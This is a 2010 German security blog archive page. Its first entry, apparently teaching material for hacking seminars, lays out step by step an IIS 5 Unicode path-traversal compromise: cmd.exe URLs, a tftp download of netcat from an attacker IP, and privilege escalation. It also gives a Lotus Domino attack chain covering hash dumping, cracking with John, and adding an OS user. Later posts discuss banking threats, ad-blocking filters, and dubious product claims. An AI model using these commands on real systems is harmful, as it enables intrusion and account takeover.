4. Juni 2010
Mehrstufige Angriffe sind nach meiner Definition Angriffe, die mit einer scheinbar kleinen Lücke beginnen, die dann aber über mehrere Einzelschritte zu einer völligen Kompromittierung eines Systems führen. In meinen Hacking-Seminaren verwende ich gerne ein Beispiel, das zwar steinalt ist, die Systematik eines Angriffs aber sehr schön vorführt: den IIS 5 Unicode Path Traversal Angriff.
Auf den ersten Blick sieht der Unicode Path Traversal harmlos aus. Man kann damit auf Dateien außerhalb des eigentlich freigegebenen Verzeichnisses zugreifen. Das sieht aus wie eine relativ harmlose Verletzung der Vertraulichkeit auf einem öffentlichen Webserver. Die Folgeschritte sehen dann so aus:
- Unicode Path Traversal erlaubt es auf Dateien außerhalb des Inetpub zuzugreifen.
- Das Scripts-Verzeichnis (und Unterverzeichnisse) enthält Dateien, die ausgeführt werden dürfen.
- Mit Hilfe des Scripts-Verzeichnisses und dem Path Traversal kann man die cmd.exe starten, wenn sich Inetpub und WINNT auf dem gleichen Laufwerk befinden. Die URL die ich verwende ist „http://[Server-IP]/scripts/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir“.
- Bequemerweise kopiert man sich die cmd.exe direkt in das Scripts-Verzeichnis.
- Über die cmd.exe kann man TFTP starten und beispielsweise Netcat herunterladen. Die URL die ich verwende ist „http://[Server-IP]/scripts/cmd.exe?/c+tftp+-i+[Angreifer-IP]+GET+nc.exe“.
- Netcat kann man wiederum über die cmd.exe als Server starten. Schon hat man einen interaktiven Zugang. Allerdings mit beschränkten Rechten.
- Mit dem IIS-Exploit der httpodbc.dll kann man LocalSystem-Rechte bekommen. Die httpodbc.dll lädt man beispielsweise via TFTP in das Scripts-Verzeichnis.
Im Ergebnis hat man dann den Rechner komplett übernommen. Natürlich gibt es den Unicodeloader, der diverse Schritte automatisch durchführt aber ich halte es für eine nette Übung, das schrittweise durchzuführen.
Für Lotus Notes gibt es jetzt eine ähnliche Anleitung: „Getting OS Access Using Lotus Domino Application Server“ (PDF) von DSecRG:
- Run raptor_dominohash script and collect all password hashes
./raptor_dominohash 192.168.0.202
- Save hashes in file using format described in the Stage 3.
- Run JohnTheRipper with hashes file generated at the previous step
./john HASH.txt –format=lotus5
- If you find administrator’s hash you can address to:
http://servername/webadmin.nsf
- In Quick Console run command that adds a new user to OS
load cmd /c net user dsecrG password /all
- For testing if this command successfully executed we run net user command and save the results to the file.
load cmd /c net user > C:\Lotus\Domino\data\domino\html\download\filesets\netuser1.png
- To view the results we open the following link:
http://servername/download/filesets/netuser1.png
Ok, für diesen Angriff braucht man ein erfolgreich gecracktes Admin-Login aber man kann das Verfahren leicht anpassen wenn man einen geeigneten Exploit für Lotus Domino hat. Mal sehen, vielleicht nehme ich das weiteres Beispiel für mehrstufige Angriffe in meinen Hacking-Workshop mit auf.
3. Juni 2010
Kommunikation mit der Bank wird immer gefährlicher. Weder Internetbanking noch Geldautomaten sind noch ausreichend sicher. Aber egal, das Risiko trägt ja bekanntlich der Kunde.
BSI-zertifizierter Kobil Kartenleser gehackt
Tja, si eine BSI-Zertifizierung ist auch nicht mehr das, was sie nie war. Der Kobil SecOVID Reader III, der vom BSI für den Einsatz nach dem strengen deutschen Signaturgesetz (SigG) zugelassen wurde, kann mit einer fremden nicht signierten Firmware geflasht werden. Und schon hat sich die Sicherheit erledigt. Und sehr schön, das Problem wurde nicht allgemein bekannt gemacht, weil es sich um „eine überschaubare Kundengruppe“ handeln soll und die die Anwendungen für Geldkarte, HBCI und Secoder nicht von der Lücke betroffen seien. Stimmt zwar nicht aber klingt besser und beruhigt die Homebanking-Kunden die ja für den Schaden haften, wenn was schiefgeht.
Mehr Geldautomaten werden manipuliert
Das Abheben von Geld am Geldautomat wird dafür auch immer unsicherer. Das BKA warnt mal wieder vor Skimming, d.h. manipulierten Geldautomaten um Kartendaten und PIN abzugreifen. „Als normaler Kunde kann man eine Manipulation im Grunde nicht erkennen“, sagte BKA-Präsident Jörg Ziercke. Und: „Viele Banken würden die Manipulationen nicht melden, weil sie sonst um ihre Reputation fürchteten“. Na toll. Aber laut AGB haftet eh der Kunde.
OCSP rettet uns auch nicht
Und für das gewöhnliche Internet-Banking gibt es auch beruhigende Nachrichten für den bösen Hacker. Das Online Certificate Status Protocol (OCSP), das vom Browser verwendet wird um die Gültigkeit von SSL-Zertifikaten zu verifizieren kann geschickt manipuliert werden. Dazu erklärt man dem Browser über eine OCSP-Statusmeldung einfach, der Server sei überlastet und der Browser solle es später nochmal probieren. Das Standardverhalten der Browser ist dann, das Zertifikat halt solange anzuerkennen.
Mobile Banking bedroht
Und für die Freunde von Mobile Banking oder Mobile TANs gibt es zum Schluß noch den Hinweis, dass zumindest im Android Market bereits eine Applikation aufgetaucht ist, die Bankzugangsdaten ausspähen sollte. Ich denke wir werden noch viel mehr in diese Richtung erleben.
Ich sollte mir mein Gehalt vielleicht wieder bar auszahlen lassen 🙂
2. Juni 2010
dem kann ich nichts hinzufügen.
Naja, hat sich ja hoffentlich erledigt.
Ich habe meine persönliche Filterliste im Adblock Plus mal überarbeitet und neu strukturiert. Ich bin sicher, man kann die Filter noch optimieren für meine Zwecke sind sie jedoch schnell und effizient genug.
Filterliste allgemeine Webbugs
Filterliste Google Analytics / Urchin
- .google-analytics.com/* (Google Analytics)
- */__utm.js (das Original Urchin Tracker Modul, Urchin 5)
- */__utm.gif?* (Urchin Tracker Modul ??)
- */urchin.js (das um Google Analytics erweiterte Modul, Urchin 6)
- */ga.js (das neue Google Analytics Javascript)
- */__ga.js (das neue Google Analytics Javascript)
- ||ajax.googleapis.com/ajax/libs/jquery/*
- ||ajax.googleapis.com/ajax/libs/jqueryui/*
Filterliste IVW / SZM
Filterliste Facebook / Like und andere Social Networks
- ||facebook.com/plugins/like.php
- ||facebook.com/plugins/likebox.php
- ||facebook.com/connect.php
- ||facebook.com/connect/connect.php
- ||facebook.com/widgets/recommendations.php
- ||static.ak.fbcdn.net/rsrc.php
- ||static.ak.fbcdn.net/connect.php
- ||badge.facebook.com/badge/
- ||api.tweetmeme.com/button.js
Filterliste Yahoo Web Analytics Tracking
Filterliste Flattr (vermutlich mache ich mich damit unbeliebt)
Spezialfilter für nervende Social Network Bookmark Links
- sueddeutsche.de##div[class^=“articlefooter“]
- sueddeutsche.de##div[id^=“bookmarking“]
- sueddeutsche.de##li[class^=“social“]
- welt.de##div[class^=“advertising“]
- welt.de##div[id^=“footerContainer“]
- welt.de##div[id^=“stickySocialBookmarks“]
- spiegel.de##div[id^=“spSocialBookmark“]
- 20min.ch##div[class^=“social_bookmarks“]
Anmerkung am Rande
Die einzige mir bekannte Webseite eines Medienunternehmens auf dem meine Filter nichts, aber auch gar nichts blockieren ist die Webseite des Titanic Magazins.
Nachtrag:
Und ja, ich habe ein (bezahltes) Titanic Abo. Das hat mir mein Bruder zu Weihnachten geschenkt 😉
Nachtrag 2:
Ich habe noch ein paar Facebook-Blockierregeln ergänzt. Das entwickelt sich echt zur Seuche. Ich denke ich werde die Liste mal komplett überarbeiten und optimieren müssen. Dann kann ich die auch als Import-Filter zur Verfügung stellen, wenn das jemand interessiert.
1. Juni 2010
Sehr schöne Beschreibung, was beim Betrieb eines komplexen Netzwerks alles schief gehen kann …
Und bestätigt meine alte These, dass neben der vorbeugenden Sicherheit längst auch ein Risikomanagement und geeignete Maßnahmen für einen Sicherheitsvorfall implementiert werden müssen.
Google trifft eine interessante und meiner Ansicht nach recht kurzsichtige Entscheidung, auf Windows im Firmennetz komplett verzichten zu wollen.
Alleine die Überlegung, statt Windows bevorzugt MacOS X mit dem ganz toll sicheren Safari Browser zu präferieren ist natürlich für jeden vom Fach sofort verständlich. Ich glaube es geht in der Thematik um zwei andere Punkte die für Google viel wichtiger sind:
1. Der symbolische Schuß gegen Microsoft. Natürlich spart Google ein paar Dollar für Windows-Lizenzen aber das ist kein Kriterium. Außerdem ist bekannt, dass MacOS X mindestens genauso viele Sicherheitslücken hat, die meisten die ich kenne halten MacOS X sicherheitstechnisch sogar für deutlich schlechter als Windows 7. Aber der Zeitpunkt ist gut gewählt um dem alten Gegner Microsoft, der Google in einigen Ländern mit Bing gerade Marktanteile abnimmt eins vor den Bug zu knallen.
2. Die Kontrolle und Überwachung der Mitarbeiter. Bei den E-Mails die in meinem privaten Outlook liegen habe ich weitgehende Kontrolle darüber. Sofern ich auf Software wie Google Desktop Search oder was es da aktuell gibt verzichten kann. Bei E-Mails, die in einem Google Mail Account liegen, bei Dokumenten die in Google Apps liegen, bei Nachrichten in Google Buzz habe ich die Kontrolle nicht mehr. Die hat Google.
Aber es klingt natürlich viel besser, wenn man die Änderung mit „Sicherheitsbedenken“ begründen kann.
31. Mai 2010
Symantec hat auf einem Server Zugangsdaten von 44 Millionen Online-Spielern aus 18 Spiele-Webseites gefunden. Insgesamt rund 17 GByte Daten, hauptsächlich wohl chinesische Seiten und Spieler, gesammelt durch den Trojaner Loginck.
Je nach Spielstufe und Charakter sei ein Account zwischen 6 und 28.000 US-Dollar wert.
Davon abgesehen, dass es mich immer wieder wundert, wie Symantec ganz zufällig auf diese Server draufkommt (klar, die analysieren den Trojaner aber berechtigt das zum Login/Einbruch auf so einen Server?) scheint das Abgreifen von Spielerdaten inzwischen extrem lukrativ zu sein. Ich bin echt überrascht.
30. Mai 2010
Tetra ist der Standard, nach dem in Deutschland das Funknetz für Behörden und Organisationen mit Sicherheitsaufgaben (Polizei, Feuerwehr, TWH, Rettungsdienste, etc.) aufgebaut wird.
Ein wenig erstaunt war ich schon, als ich durch die Liste der Tetra Association Members scrollte und diese „Firma“ dabei entdeckte:
Aber cool 🙂
28. Mai 2010
Die bisherige Diskussion lief auf Grund meines Beitrags mit dem Titel „Victorinox Snake Oil Crypto?„. Dort hatte ich Bruce Schneiers Warnsignal #9 vor schlechter Kryptographie zitiert:
Warning Sign #9: Cracking contests: Contests are a terrible way to demonstrate security. A product/system/protocol/algorithm that has survived a contest unbroken is not obviously more trustworthy than one that has not been the subject of a contest. The best products/systems/protocols/algorithms available today have not been the subjects of any contests, and probably never will be. Contests generally don’t produce useful data.
Und ich hatte darauf hingewiesen, dass Victorinox schlecht beraten sei, die Sicherheit ihres Produkts durch zweifelhafte Wettbewerbe beweisen zu wollen. Insbesondere, wenn die Angreifer nur wenige Stunden zur Verfügung gestellt bekommen. Die echte Gefahr ist, dass man den Stick verliert (oder er geklaut wird) und der Angreifer beliebig viel Zeit hat an die Daten zu kommen. Ich schrieb damals in den Kommentaren auch, dass ich den Stick für ein eigentlich durchdachtes Produkt halte.
Diese Meinung möchte ich jetzt revidieren. Hier sind meine Indizien:
Victorinox Warning Sign #1: Falsche Testimonials
Steffen Müller, der scheinbar offiziell im Namen von Victorinox in allen möglichen Foren und Blogs kommentiert und auch Hilfestellungen im offiziellen Victorinox-Forum gibt, schrieb hier in den Kommentaren:
Prof. Tom Wearbou (Security Head Engineer of NSA) wrote: “MKI’s new Schnuffi chipset: This is not only a chapter for itself, it’s also a new chapter in data history. We got some samples about 5 months ago. After 4 months working and almost 1 Million investment in new Hardware the chipset blows the whole device up before we had a real chance to get our hand on the data… This is not a normal chipset… this is a nasty bitch! “
Ich halte diese Behauptung für frei erfunden. Ich bin mir sehr sicher, dass es keinen Prof. Tom Wearbou gibt. Google findet für diesen Namen genau zwei Seiten und beide sind Kommentare zum Victorinox-Chip. Jeder Professor muss irgendwann ein paar wissenschaftliche Veröffentlichungen haben, sonst wird man nirgends auf der Welt Professor. Diese müsste man auch finden, selbst wenn der gute Mann bei einem Geheimniskrämerladen wie der NSA arbeiten sollte. Auch Varianten des Namens führen nicht weiter. Und Google ist sehr gut darin, mir bei Tippfehlern Alternativen vorzuschlagen.
Ich ziehe diese Behauptung natürlich sofort zurück, wenn mir irgendjemand einen Nachweis für diesen Professor bzw. ein solches Schreiben geben kann.
Victorinox Warning Sign #2: MKI Schnuffi Chip
Kryptographie ist schwierig. Siehe WEP. Selbst wenn man Kryptographie richtig versteht kann man sie immernoch falsch implementieren. Ich kann mir nicht wirklich vorstellen, dass eine (zugegebenermaßen gute) Messerschmiede einen tollen neuen Chip entwickelt, den niemand zerlegen kann. Haben sie wohl auch nicht.
Mein aktueller Wissensstand ist, dass die Technologie angeblich von Martin Kuster kommen soll, dem u. a. Parrot’s Consulting in Zug gehört. Parrot’s Consulting soll wiederum zu einer MKI Group (MKI = Martin Kuster International?) der MKI Enterprises gehören. Beide Webserver residieren auf der gleichen IP-Adresse. Das Anmeldefeld auf der Webseite von MKI sieht so aus als würde es nie verwendet. So wird bei der Eingabe das Passwort im Klartext angezeigt und der Anmeldeknopf führt direkt auf eine Fehlerseite. Auf Deutsch, die Webseite der MKI Enterprises, Rancho Bernardo, CA, USA sieht aus wie eine Alibiwebseite einer Firma die es gar nicht gibt. Domaintools behauptet, auf dem Server der Earthlink gehört (webhost.earthlink.net) werden 76.694 Webseiten gehostet.
Victorinox Warning Sign #3: USB Compliance
Der USB-Stick wurde nach meinen Informationen 2009 von NTS (National Technical Systems) auf Konformität mit dem USB-Standard getestet. Das Produkt hat den Text bestanden, kann jedoch nicht USB-IF zertifiziert werden, weil die Einschaltströme außerhalb der USB-Spezifikation liegen. Ich bin mir nicht mal sicher, ob Victorinox das „Certified USB High-Speed“-Logo das sich in den Datenblättern des Sticks befindet, überhaupt verwenden darf. Auf der Webseite des USB Implementation Forums gibt es eine Datenbank der zertifizierten Produkte. Ich kann da weder „Schnuffi“ noch „MKI“ und auch nicht „Victorinox“ finden. Ich habe aber vorsichtshalber mal eine Anfrage an das USB IF geschickt.
Ansprechpartner bei Victorinox für den Test war Martin Kuster. Hersteller des Chips laut Testbericht eine „MKI Electronics Division“, für die mir Google ein „Keine Ergebnisse für „mki electronics division“ gefunden“ ausspuckt. In der USB-Zertifizierung wird übrigens nur die Signalqualität gemessen, nicht die tatsächliche Übertragungsgeschwindigkeit des Gerätes. Ein High-Speed USB-Device muss deshalb noch keine High-Speed Übertragung anbieten.
Victorinox Warning Sign #4: Martin Kuster
Ich habe eine Weile überlegt ob ich diesen Abschnitt aufnehmen soll. Immerhin wird es jetzt etwas persönlich. Aber Martin Kuster behauptet, er habe den Snuffi Chip entwickelt und die Firma die den Chip baut, gehöre auch ihm. Außerdem behauptet auch Martin Kuster, die NSA hätte seinen Chip erfolglos versucht zu hacken.
Martin Kuster verwendet für die Kommunikation anscheinend gerne mal eine E-Mail-Adresse von MSN. Ich habe den Mailheader untersucht, die Mails gehen tatsächlich über hotmail.com. Auch die IP-Adressen im Header gehören alle Microsoft. Insofern finde ich wiederum den Footer in der Mail interessant, in dem steht:
„For you safety this message and its attachments (if applicable) were scanned for virus on MKI’s main mail server in Atlanta, Georgia / USA. This may delay the mail for a view minutes. „
Ich bin mir nämlich sehr sicher, dass die Mails niemals über einen MKI-Server in Atlanta gegangen sind.
Und das Gesamtpaket mit falschen Testimonials und einem Chip von einer praktisch nicht existenten Firma sieht für meinen Geschmack nach meiner sehr persönlichen privaten Meinung nun einmal sehr komisch aus.
Oder?
Ach ja, wenn jemand einen solchen USB-Stick hat, jedes USB-Teil hat eine Vendor-ID. Ich würde gerne mal wissen, wer da wirklich als Hersteller dahintersteckt. Ich mag da ungern 70 (8 GB) bis 190 Euro (32 GB) zum Fenster rauswerfen.
25. Mai 2010
Sozusagen meine Zahl des Tages. Soviel hat nämlich laut ARD und Angaben des BKA die Online-Durchsuchung von Rechnern bisher gekostet (davon 581.000 Euro Personalkosten, also etwa 8-10 Personen die sich damit beschäftigen, der Rest also 119.000 Euro dürften Lizenz- und Hardwarekosten, Büromiete, Reisekosten, allgemeiner Verwaltungsaufwand, etc. sein). Und das alles für bisher keine einzige durchgeführte Online-Durchsuchung. Na wir haben’s ja.
